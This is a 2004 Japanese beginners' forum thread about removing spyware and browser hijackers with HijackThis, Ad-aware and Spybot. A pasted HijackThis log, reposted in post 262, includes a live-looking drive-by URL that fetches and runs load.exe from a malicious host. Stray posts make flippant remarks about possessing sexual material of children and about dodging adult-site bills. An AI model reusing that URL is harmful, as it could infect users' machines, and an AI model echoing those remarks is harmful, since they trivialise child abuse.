インターネット一時ファイルを削除して、履歴もクリアする。
これをやらずにおくと、IEのホームをキャッシュや過去のデータを元に好き放題に変えられてしまう。
仕上げは、先にメモしておいたスパイウェアの名前を
スタート→検索→ファイルやフォルダで検索にかける。
一度削除したつもりでも、意外な所にコピーを作成して再び増殖することがよくある。
おかしなものが見つかったらこれも手動で削除する。
ここまでやっておいてからネットに接続。
ad-aware、Spybotをアップデートし、もう一回スパイウェアを探す。
これでも駄目なら、Windowsフォルダ内のSystem以外のフォルダもしらみつぶしに同様の方法で探す。
骨の折れる作業だが、地道に一つひとつ取り除いていけば必ずパソコンは復活させることができる。
症状が重く、パソコンが満足に動かないときはSafe Modeで立ち上げる。

189 :ひよこ名無しさん:04/07/07 15:08 ID:???
>>188
どう縦読みするんだ?

190 :ひよこ名無しさん:04/07/07 15:09 ID:S7Kb/+Q7
Seach Forのウイルスに感染しました。
ブラウザを立ち上げるとSeach Forに飛ぶんですが
その時「ウィルスに感染してます。駆除をするにはここで駆除ソフトを
ダウンロードしてください。」みたいな小窓が立ち上がり
駆除ソフトのリストがでるんですが、コレは信用していいんですか。
spyblocs.exeなる駆除ソフト?をダウンロードしたんですが。

191 :ひよこ名無しさん:04/07/07 15:15 ID:???
ダウンロードすんなよw

192 :ひよこ名無しさん:04/07/07 15:29 ID:???
もう海外系の怪しいエロサイトには逝くなよ。行く場合は準備万端にして細心の注意
を払えよ。

193 :ひよこ名無しさん:04/07/07 15:30 ID:???
>>190
あんた幸せ者だね

194 :ひよこ名無しさん:04/07/07 15:30 ID:???
>190
あのなあ、キミ、それをウィルスだと思ってるんでしょう?
(まー本当はウィルスではないわけだけれども)
そんなもんが紹介するもの信じてダウンロードするのは、おかしいと思わない?

で、ちゃんとテンプレ読んだり、書いてあることを試したりしてる?
search forの対処法も書いてあるはず。
質問はテンプレにある対処法を実行して、それでもダメなときになさい。
やむをえず質問する場合も、「質問のしかた」くらいは守んなさい。


195 :ひよこ名無しさん:04/07/07 15:32 ID:???
>>190
スレをよく読めば分かるけど、ブラウザハイジャッカーというものだよ。
広告を強制的にみせたい業者等に問題があるんだよ。

196 :ひよこ名無しさん:04/07/07 15:46 ID:1cbLjsvS
どうしたら履歴消せますか。
ホントに初心者で申し訳ないですが。


197 :ひよこ名無しさん:04/07/07 15:48 ID:???
>>196
窓の手使え。

198 :190:04/07/07 16:01 ID:S7Kb/+Q7
>>191
もう手遅れだ、リストから3つ見つくろってダウンロードしちまった。
>>192
断る。エロページ見るためにインターネット契約してんだよ。
>>193
ありがとよ。
>>194
IEの親切な機能で駆除ソフトを紹介してくれてるとも思うじゃん。
>>195
NortonとAd-awareやったけど直らず。
手動駆除はソースにテンプレみたいな文字列が現れない。亜種かも知れない。
トレンドマイクロのオンラインや他の駆除ソフトは途中で画面がSeach forに乗っ取られる。

199 :ひよこ名無しさん:04/07/07 16:03 ID:???
>>198
FAQ読め
http://hyper10.amuser-net.ne.jp/~auto/b3/usr/azumi/brd1/bbs.cgi

200 :ひよこ名無しさん:04/07/07 16:11 ID:???
>>198
>エロページ見るためにインターネット契約してんだよ。
アフォには無理。

201 :ひよこ名無しさん:04/07/07 16:13 ID:???
>>198
救いようの無い馬鹿だな(゚∀゚)アヒャヒャヒャヒャ

202 :194:04/07/07 16:14 ID:???
>198
普通は思わないよ。
IEにそんなお便利機能があるならセキュリティソフトベンダーのサイトなんかいらんし
ここまで「エロサイト行くならIE以外のブラウザ使え」とも言われんわい。

こういうヤツがいるから、ウィルスも、スパイウェアも、被害が拡大するんだなあ・・・(しみじみ)

でさ、キミ、>>9(テンプレ6)は読んで実行したの?
こんな何も役に立たないレス返す前に、とっととやっちゃいなさい。
そのほうが解決に近づくし、キミのためだと思うんだけど。


203 :ひよこ名無しさん:04/07/07 16:16 ID:???
自ら落とし穴に嵌りに逝った香具師に何をかいわんやです

204 :ぼるじょあ ◆yBEncckFOU :04/07/07 16:33 ID:???
>>198
(^3^) エェー  エロがメインかYO
このドスケベ野郎ME

205 :ひよこ名無しさん:04/07/07 17:12 ID:???
>>204
厨房くさい

206 :ひよこ名無しさん:04/07/07 17:28 ID:rm4QngnF
ホームページが
http://look-today.com/passthrough/index.html?http://www.google.co.jp/
になってしまいます。何回戻しても直りません。どうしたらいいでしょうか?
どうかお願いします

207 :ひよこ名無しさん:04/07/07 17:30 ID:???
>>206
テンプレ読んでから質問しろ

208 :ひよこ名無しさん:04/07/07 17:35 ID:???
テンプレ読んできました。 
WindowsXPなんで、システムの復元をやったらなんどもやっても失敗ばかりでできません。
ad-awareなどもためしてもだめでした。
コンピュータウィルス総合スレッド VOL.38にレスした時ので、案内されてきました

スパイウエアに感染して、ad-awareを使ったんですけど直りません。
デスクトップも変な画像になってしまっています。
プログラムの追加と削除で見てみましたが、なにを削除すればいいのかわかりません
どなたか教えてください。 OSはWindowsXPです。
プログラムの追加と削除
Windows SR2,0
Windows SA
SEP
NVIDIA n FORCE
@BIOS
DiscWizard
NOAdware
WildArcade
ATiControl Panel
ATI Dispay Driver
Direct Show ogg
IE Host
LOgicool itouchソフトウエア
LOgicool Mouseware 9,79,1
Macromedia shockwave play
MAX speed
WindowsXP service pack 1a
Windows ホト
Broad station ユーサリティ
Internet EXploer Q832894

209 :ひよこ名無しさん:04/07/07 17:38 ID:???
>>208
テンプレの何番に、プログラムの追加と削除を見ろなんて書いてあった?

210 :ひよこ名無しさん:04/07/07 17:39 ID:???
あー!もうメンドクセ!
Seach Forが消せないんで、IEからOperaに乗り換えたら症状は出なくなんの?

211 :208:04/07/07 17:40 ID:???
>>209
http://haiiro.info/my/text/template.html
応急処置の5番あたりです

212 :ひよこ名無しさん:04/07/07 17:40 ID:???
>>210
まだ報告がないから、実験台になってくれ。

213 :ひよこ名無しさん:04/07/07 17:42 ID:???
>>211
いちおうあったか。
でも、最近の派それじゃ駆除できない。
ほかのも実行しろ。

214 :208:04/07/07 17:43 ID:4uOIazMY
すいませんなぜかsageとはいってしまいました。
>>213
全部実行しました

215 :ひよこ名無しさん:04/07/07 17:46 ID:???
はっきり言って初心者にはスパイウェアはキツすぎる・゜・(ノД`)・゜・
あんな手口で広告見せられて、誰が買う気になるんだよまったくよォ!
開発者はそれくらいも分かんねぇのか、コラ?



…とずっと思っていたが
>>190とか見てると、たまにホイホイ購入する香具師もいるから
なくならないんだろうな〜…と、悲しくなった。

216 :ひよこ名無しさん:04/07/07 17:54 ID:ofGHNVKn
http://game6.2ch.net/test/read.cgi/arc/1089186826/

17 名前:ゲームセンター名無し 投稿日:04/07/07 17:08 ID:???
今日中にこのスレ500行ったら
えっちなものうpするね…

だそうです。記念カキコよろしくお願いします。
ついでに、他の板・スレッドに宣伝もお願い致します。

217 :ひよこ名無しさん:04/07/07 17:57 ID:???
>214
プログラムの追加と削除だけ書かれてもなあ・・・
本当にテンプレ全部やったんなら、>>10の「テンプレ7」でもしてみれば?


218 :ひよこ名無しさん:04/07/07 18:08 ID:???

Opera 7.23(日本語版) http://opera.livedoor.com/download/

Mozilla Firefox(日本語版) http://www.mozilla.gr.jp/jlp/#firefox

219 :ひよこ名無しさん:04/07/07 18:11 ID:???
>>208
NOAdware
Freeといいながら3千円。
なんでそんな怪しげなものをインストールし(ry

220 :ひよこ名無しさん:04/07/07 18:11 ID:???
>>210
私の考えだと,厳しいすね。

about:blank/search for 型の問題はどうも AppInitDLL レジストリも絡んでるんすよね?
このレジストリに登録された DLL は,どんなアプリケーションを起動しても
必ずロードされるものらしいので,Opera や mozilla(firefox) を起動したって
読み込まれるはずです。
DLL がロードされる以上,仮にアプリケーションを使っている際に異常を感じなくとも
裏で何をやられているか判りません。むしろ,殆ど何でもできます。
よって根本的な解決ではありません。

しかし IE で about:blank を開くと search for ... が開かれるなんて,どんなトリックなんでしょうね。
患った事がないので詳細に観察した事もないんだけど,私にはそのトリックが思いつきません。。。

221 :208:04/07/07 18:17 ID:4uOIazMY
>>217
すいません、できないのでとばしてました。
デスクトップで右クリックしても新規作成なんて項目ないんです。
さきほども書きましたが、変な画像がデスクトップにあるんです。
>>219
釣りだよね?

222 :ひよこ名無しさん:04/07/07 18:20 ID:???
>>221
その画像をアプロダに上げて。

223 :ひよこ名無しさん:04/07/07 18:23 ID:???
>>221
釣りじゃない。
スパイウェアに感染した時にダイアログが表示されて、
それをインストールするように進められませんでしたか?
その時にインストールしたんじゃないかな。
NOAdwareでググったら同じような状態の人がいたよ。
Freeって書いてあるが、使おうとしたら3千円だったてやつ。

224 :ひよこ名無しさん:04/07/07 18:29 ID:???
>>221
ググルのキャッシュの情報より。
いかさまスパイウェア除去ソフトリストに入っていた。
ttp://www.google.co.jp/search?q=cache:z-zLsHcrugcJ:higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi%3Fmode%3Dn_w%26s%3D0%26no%3D2+NOAdware&hl=ja&lr=lang_ja&inlang=ja

225 :208:04/07/07 18:31 ID:4uOIazMY
>>222
あの、すいません。 変なこと聞きますがアップロードにあげるにはどうすれば?
自分てきにはマイピクチャーとか保存するんですがそれはできなかったです
画像をクリックすると変なページに飛ばされるようになっていて引っ張ることもできません

>>223 
払わないってことは無理ですか?

226 :ひよこ名無しさん:04/07/07 18:35 ID:???
俺の場合は
c:\windows\system32\mfhhb.dll
これを削除したらSearch forがでなくなった。

227 :208:04/07/07 18:36 ID:4uOIazMY
>>224
ありがとうございます。読んできました。
これってもうどうしようもないですよね? まんまと騙されたという訳ですか?

228 :ひよこ名無しさん:04/07/07 18:36 ID:???
ttp://up.nm78.com/im1.html


229 :ひよこ名無しさん:04/07/07 18:37 ID:???
>221=208
デスクトップじゃなくていいから、テキトーなとこに新しいフォルダつくって
そこにHijackThisいれんさい。

230 :ひよこ名無しさん:04/07/07 18:38 ID:???
>>226はマジ?

231 :ひよこ名無しさん:04/07/07 18:40 ID:???
>>230
ファイル名は毎回変わる。
レジストリの AppInit_DLLs が鍵みたい。

232 :208:04/07/07 18:45 ID:4uOIazMY
>>229
行ってきました。
ttp://ame.dip.jp/upload/1089/193407.log       
です。
かってなとこの掲示板のアップローダ使っちゃいましたけどまずいんですしょうか?

233 :208:04/07/07 18:49 ID:4uOIazMY
あれ? 見れないですよね?

234 :ひよこ名無しさん:04/07/07 18:59 ID:???
どうにもならない時は、HijackThisでLogを取って、自己責任でやるしかない。
私の場合、Spybot,Ad-awer,HijackThisでなんどもFixしても、
HijackThisのLogにしつこくintsrvと言うのが現れたので、
おもいきってintsrvと言うファイルを検索して削除してみました。
Search forは出なくなりました。その代わり、プラグインも消え去ってましたけどw
まあ、プラグインはあとでまたDLしましたがw
でも頭にきたのでFirefoxに乗り換えてしまいました。

235 :208:04/07/07 19:01 ID:4uOIazMY
>>232
はちゃんと見れてます?

236 :ひよこ名無しさん:04/07/07 19:03 ID:BVeDChX4
spywereに犯されたのでAD-awareやspybot
を使ったのですが、何度やっても検出されるのです.
今はトップページは元に戻ったのですが、書き込みや検索のとき、日本語変換できません。
どうすれば直りますか?


237 :ひよこ名無しさん:04/07/07 19:05 ID:???
> どうにもならない時は、HijackThisでLogを取って、自己責任でやるしかない。

238 :ひよこ名無しさん:04/07/07 19:05 ID:???
>>235
あめぞうの外からは見れないし、削除される。
PC初心者板のアプロダ2号
http://cgi.f4.aaacafe.ne.jp/~angel/cgi-bin/upload.php

239 :208:04/07/07 19:10 ID:4uOIazMY
拡張子.logはなんの拡張子にすればいいですか?

240 :ひよこ名無しさん:04/07/07 19:13 ID:tv6fPsfG
>206
>1を全部読めば解決しますよ
私もそうなりました

241 :ひよこ名無しさん:04/07/07 19:13 ID:???
ズゴックは最強です。
あの曲線的なボディラインは機能美を象徴します。
さらにMSの弱点とも言えるカメラアイ。
そのカメラアイの防御性能をあそこまで高めることが出来たのもあの独特なスタイルのおかげです。
そしてあのクローは威力の高さはもちろんの事、敵パイロットにも威圧感を与えます。
MSの存在意義ともいえるものは接近戦ですがズゴックほど接近戦を考慮して開発されたMSは無いでしょう
さらに水陸両用。地上での主導権をもつMSは水陸お構いなしで戦ってくれるズゴックです。
シャアもその性能を認めトレードカラーに塗り替えたズゴックを使用しました。
ドムやグフやゲルググの簡易量産型MSは存在しません。
しかしズゴックは違います。アッガイという簡易量産型MSがあるのです。
これほどその性能を認められたMSも珍しいでしょう。
さらに、ドムやグフやゲルググは一年戦争後はともかく戦中に開発されたバリエーションは数えるにも及ばないでしょう。
がしかし、ズゴックはどうでしょうか?
水中実験機からプロトタイプゴッグ、ズゴック、アッガイ、ゾッグ、ジュアッグ、アッグガイ、アッグ、ゾゴック、ハイ・ゴック、ズゴックE、ガッシャ。
ザクマリンから研究が始まり様々なバリエーションが開発されました。
ズゴックの開発はMAの開発にも影響を与えたと考えられます。
ビグロやザクレロ、ビグ・ザムまでも皆クローを装備しています。
完璧でしょう。まさにズゴックはMSの完成形といっても過言では無いでしょう。
水陸両用MSがジャブロー攻略戦に適任と判断されたのも頷けます。

242 :ひよこ名無しさん:04/07/07 19:24 ID:???
>239
てゆーか、HijackThisのログは内容をコピーしてここに貼り付けなさい。

243 :208:04/07/07 19:27 ID:4uOIazMY
Logfile of HijackThis v1.97.7
Scan saved at 18:41:51, on 2004/07/07
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\ctfmon.exe

244 :208:04/07/07 19:29 ID:4uOIazMY
C:\Program Files\Melco Inc\BroadStation ユーティリティ\ABRECEIVER\ABReceiver.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Program Files\Logicool\iTouch\iTouch.exe
C:\WINDOWS\system32\explorer.exe
C:\WINDOWS\System32\cmgnisy.exe
C:\Program Files\WindowsSA\omniscient.exe
C:\documents and settings\s5511\local settings\temp\9c.exe
C:\WINDOWS\System32\IEHost.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Orchis\orchis.exe
C:\Documents and Settings\s5511\Application Data\rret.exe
C:\WINDOWS\system32\explorer.exe
C:\WINDOWS\System32\nobpj.exe
C:\Program Files\MauSuji\MauSuji.exe
C:\Program Files\Logicool\MouseWare\system\em_exec.exe
C:\WINDOWS\System32\conime.exe
C:\Documents and Settings\s5511\My Documents\My Music\Hijackthis\HijackThis.exe


245 :208:04/07/07 19:32 ID:4uOIazMY
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - (no file)
O2 - BHO: (no name) - {1FDC3506-C845-73C7-D553-615504AC7A4D} - C:\WINDOWS\System32\vncrqkve.dll
O2 - BHO: (no name) - {2183C835-3C79-4A86-A6C6-8EF646D8DE13} - C:\WINDOWS\System32\pinmhaa.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {B9D90B27-AD4A-413a-88CB-3E6DDC10DC2D} - C:\WINDOWS\msopt.dll
O2 - BHO: (no name) - {C5183ABC-EB6E-4E05-B8C9-500A16B6CF94} - C:\Program Files\SEP\sep.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Band Class - {C5183ABC-EB6E-4E05-B8C9-500A16B6CF94} - C:\Program Files\SEP\sep.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ABRECEIVER] "C:\Program Files\Melco Inc\BroadStation
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logicool\iTouch\iTouch.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [pgjcden] C:\WINDOWS\pgjcden.exe
O4 - HKLM\..\Run: [Explorer] C:\WINDOWS\system32\explorer.exe

246 :208:04/07/07 19:35 ID:4uOIazMY
LM\..\Run: [gmagtcib] C:\WINDOWS\System32\cmgnisy.exe
O4 - HKLM\..\Run: [Windows SA] C:\Program Files\WindowsSA\omniscient.exe
O4 - HKLM\..\Run: [9c.exe] C:\documents and settings\
O4 - HKLM\..\Run: [Bakra] C:\WINDOWS\System32\IEHost.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Orchis] C:\Program Files\Orchis\orchis.exe
O4 - HKCU\..\Run: [Ureh] C:\Documents and Settings\
O4 - HKCU\..\Run: [Nauprbn] C:\WINDOWS\System32\nobpj.exe
O4 - HKLM\..\RunOnce: [Ad-aware] "C:\PROGRA~1\Lavasoft\AD-AWA~1\Ad-aware.exe" "+b1"
O9 - Extra 'Tools' menuitem: MaxSpeed (HKLM)
O15 - Trusted Zone: *.mt-download.com
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://hard-virgins.com/dl/ms/x.chm::/load.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab28578.cab
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab

247 :208:04/07/07 19:38 ID:4uOIazMY
O4 - HK
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab28578.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - http://www.mt-download.com/MediaTicketsInstaller.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38126.8218055556
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {FF65677A-8977-48CA-916A-DFF81B037DF3} (WMService Class) - http://download.overpro.com/WildApp.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{46211A8E-187F-49F8-A791-6BE5D2C089DC}: NameServer = 192.168.11.1

248 :208:04/07/07 19:39 ID:4uOIazMY
すいません。
なんか貼っちゃいけないのまで貼っちゃいました?
これで全部です

249 :ひよこ名無しさん:04/07/07 19:42 ID:???

Opera 7.23(日本語版) http://opera.livedoor.com/download/

Mozilla Firefox(日本語版) http://www.mozilla.gr.jp/jlp/#firefox


250 :ひよこ名無しさん:04/07/07 19:44 ID:???

Opera 7.23(日本語版) http://opera.livedoor.com/download/

Mozilla Firefox(日本語版) http://www.mozilla.gr.jp/jlp/#firefox

251 :ひよこ名無しさん:04/07/07 19:46 ID:???

Opera 7.23(日本語版) http://opera.livedoor.com/download/

Mozilla Firefox(日本語版) http://www.mozilla.gr.jp/jlp/#firefox

252 :ひよこ名無しさん:04/07/07 19:50 ID:???
Opera v7.51のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5からは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.51(最新版)http://www.opera.com/download/?lng=en&ver=7.51
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。

253 :ひよこ名無しさん:04/07/07 20:03 ID:???
>>208
全てのアプリを閉じてHijackThisだけを実行し以下をFix。
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O2 - BHO: (no name) - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - (no file)
O2 - BHO: (no name) - {1FDC3506-C845-73C7-D553-615504AC7A4D} - C:\WINDOWS\System32\vncrqkve.dll
O2 - BHO: (no name) - {2183C835-3C79-4A86-A6C6-8EF646D8DE13} - C:\WINDOWS\System32\pinmhaa.dll
O4 - HKLM\..\Run: [pgjcden] C:\WINDOWS\pgjcden.exe
O4 - HKLM\..\Run: [Explorer] C:\WINDOWS\system32\explorer.exe
LM\..\Run: [gmagtcib] C:\WINDOWS\System32\cmgnisy.exe
O4 - HKLM\..\Run: [Windows SA] C:\Program Files\WindowsSA\omniscient.exe
O4 - HKLM\..\Run: [9c.exe] C:\documents and settings\
O4 - HKLM\..\Run: [Bakra] C:\WINDOWS\System32\IEHost.exe
O4 - HKCU\..\Run: [Ureh] C:\Documents and Settings\
O4 - HKCU\..\Run: [Nauprbn] C:\WINDOWS\System32\nobpj.exe
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!ttp://hard-virgins.com/dl/ms/x.chm::/load.exe
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - ttp://www.mt-download.com/MediaTicketsInstaller.cab
O16 - DPF: {FF65677A-8977-48CA-916A-DFF81B037DF3} (WMService Class) - ttp://download.overpro.com/WildApp.cab

その後にvncrqkve.dll、pinmhaa.dll、pgjcden.exe、cmgnisy.exe、IEHost.exe、omniscient.exe、9c.exe
IEHost.exe、nobpj.exeをその場で圧縮してごみ箱に移して再起動。
explorer.exeは消さないように注意。
問題が起きたらHijackThisでRestoreして圧縮ファイルを解凍すれば元に戻せる。
また特定のアプリケーションが動作しない場合は再インストールすること。

254 :208:04/07/07 20:26 ID:4uOIazMY
>>253
ありがとうございます。
あの、Fixってのは削除という意味ですか?

255 :ひよこ名無しさん:04/07/07 20:31 ID:???
>>208
追加でこれもFix。
O3 - Toolbar: Band Class - {C5183ABC-EB6E-4E05-B8C9-500A16B6CF94} - C:\Program Files\SEP\sep.dll
sep.dllも圧縮してごみ箱に移す。
再インストール=リカバリではありません。念のため。

256 :ひよこ名無しさん:04/07/07 20:38 ID:???
>>208
Fixはレジストリのエントリーの消去&バックアップみたいなものです。
02ならBHO。04ならRunの値の部分のレジストリを消去させます。
Fixしただけでは完全の消去にはなりません。本体のexeやdllも消去します。

例えば、
O4 - HKLM\..\Run: [Bakra] C:\WINDOWS\System32\IEHost.exe
ならばWindows>System32の中にIEHost.exeが入っていることをあらわしています。
IEHost.exeをHD検索や上の情報から見つけてその場で圧縮(安全を見るため)、
IEHost.exeを手動でごみ箱に移します。
ファイル使用中の場合はその作業をセーフモードで実行します。

257 :ひよこ名無しさん:04/07/07 20:46 ID:???
>>208
O2 - BHO: (no name) - {B9D90B27-AD4A-413a-88CB-3E6DDC10DC2D} - C:\WINDOWS\msopt.dll
O2 - BHO: (no name) - {C5183ABC-EB6E-4E05-B8C9-500A16B6CF94} - C:\Program Files\SEP\sep.dll
これも見落としてました。
この値も他と同様にFixしてmsopt.dll、sep.dllをその場で圧縮してごみ箱に送ってください。

作業がひと段落したらもう一度Ad-Awareを実行して、
ごみの掃除もお忘れなく。

258 :208:04/07/07 20:47 ID:4uOIazMY
>>256
詳しい説明ありがとうございます。
>>253 の下のほうの その後に.........をその場で圧縮して削除というのは
Hijack thisを消した後に、マイコン→Cドライブ.... みたいなかんじで探して削除という意味ですか?

259 :ひよこ名無しさん:04/07/07 20:49 ID:???
>>258
(゚Д゚)ハァ? 糞して寝ろヴォケ

260 :ひよこ名無しさん:04/07/07 20:56 ID:tv6fPsfG
全部FIXすれば治るよ
大事なやつは消せないから

261 :ひよこ名無しさん:04/07/07 20:58 ID:???
>>208
大体はそんな意味であってます。
HijackThisでFixした後にその場所を探して目的のexeやdllを圧縮して、ごみ箱に移します。
ファイル名が分かっているのなら検索を使って探してもオッケーです。
圧縮というのは圧縮ソフトで行います。
圧縮はかならずそのフォルダの中で実行してください。
圧縮しておけばほとんどのトロイやスパイウェアは活動しません。
もし圧縮ソフトが分からないのであれば、
詳細はグーグルなどで検索して見つけてきてください。

262 :ひよこ名無しさん:04/07/07 21:00 ID:???
ふははは kerioに登録したよ

http://hard-virgins.com/dl/ms/x.chm::/load.exe   

263 :208:04/07/07 21:13 ID:4uOIazMY
>>261
圧縮はプロパティで拡張子をかえるのではいけないんですか?
送る などで圧縮しても無駄なんですか?
目的のexeなどはどうやって探せば一番効率がよいでしょうか?

264 :ひよこ名無しさん:04/07/07 21:26 ID:???
HijackThisでFixした後、ファイルをごみ箱に移動するだけで大丈夫だよ。

265 :ひよこ名無しさん:04/07/07 21:45 ID:kM+XJl4f
>>554
何の優良サイト一覧なのか具体的に

エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/

ここの>>1->>11
を見たらわかるかもね

266 :>>265:04/07/07 21:45 ID:kM+XJl4f
誤爆

267 :ひよこ名無しさん:04/07/07 22:03 ID:???
('A`)マタキャクガクルノカ?

268 :ひよこ名無しさん:04/07/07 22:07 ID:???
最近売り上げ落ちてるんでヨロシク。

269 :ひよこ名無しさん :04/07/07 22:55 ID:WJygKudk
ロリ関係のものって所持だけでも罪になるんですか?
過去、捕まった人とかいるのでしょうか?

270 :ぼるじょあ ◆yBEncckFOU :04/07/07 22:57 ID:???
>>269
(・3・) エェー 日本では単純所持は違法じゃなかったようNA
          アメリカでは娘の水着写真持ってて捕まった親父さんいた気がするYO

271 :ひよこ名無しさん :04/07/07 23:16 ID:WJygKudk
さんくす。確かにダウソしたから捕まったとかは聞いたことないな

272 :ひよこ名無しさん:04/07/08 00:45 ID:???
>>269
モノホンの小学生買ってる政治家やマスゴミ関係者がいる間は大丈夫

273 :ひよこ名無しさん:04/07/08 03:35 ID:QuZaLGW5
実際にアダルトサイト利用して、踏み倒そうとしたら
やっぱり、家に押し入ってやってくるんだろうか?
友人が催促状連発でその状況なのだが、俺もネット初心者な為
「来るんじゃねー?」と思っていたのだが、ふときになった。実際にどうなんだろう?
相手に知られている情報はプロバイダーメールとサイトに行ったんだから
IPだろうと思う。
携帯で出会い系だとかだと、電話とかで・・・なら知っているんだが、ネットだと本当に押しかけてくるんだろうか?
それとも、やっぱりそこまで暇な業者もいるんだろうか。

274 :ひよこ名無しさん:04/07/08 03:47 ID:???
>>273
よく知らんが無修正の写真とか動画は違法だから
来たら警察呼んでやれ 

275 :ひよこ名無しさん:04/07/08 03:50 ID:QuZaLGW5
>>274
肝心のどんなサイトかは言ってなかったな
何か女とライブチャットって奴でエロい事できるやつらしい。
要は風俗とは行かないが、そんな感覚の奴かな

って事は、動画とかじゃない訳だから、危険度は高いか|-_-)


276 :ひよこ名無しさん:04/07/08 04:02 ID:???
何でもないような事が 幸せだったと思う
 何でもない夜の事 二度とは戻れない夜

277 :ひよこ名無しさん:04/07/08 07:09 ID:2/KaVnW6
?????


278 :208:04/07/08 10:40 ID:xc3ZGzg3
ドラえもんのタイムふろしきで少し昔に戻したら直りました。
どうもありがとうございました

279 :ひよこ名無しさん:04/07/08 11:09 ID:ftiL9SiI
今PC起動したら、デスクトップにへんなアプリケーションが追加されてました
んで、削除しようとしたら「この作業ではアンインストールされません」って出てきて
コントロールパネルから削除しようと思ったんですけど一体どれを削除していいのかわかりません。
ていうかデスクトップにある奴の名前のものがコントロールパネルにありません

それとネットに繋いで最初に出てくるページも変わってました。
インターネットオプションで直そうとしても、また元に戻ってしまいます。

OSはWinMEです
パソコン初心者板総合質問スレから誘導されますた

280 :ひよこ名無しさん:04/07/08 11:10 ID:???
>>279
マルチするな。死ね。

281 :ひよこ名無しさん:04/07/08 11:14 ID:???
>>279
テンプレ読まないヤシはお仕置きよ!

282 :279:04/07/08 11:45 ID:???
ドラえもんのタイムふろしきで少し昔に戻したら直りました。

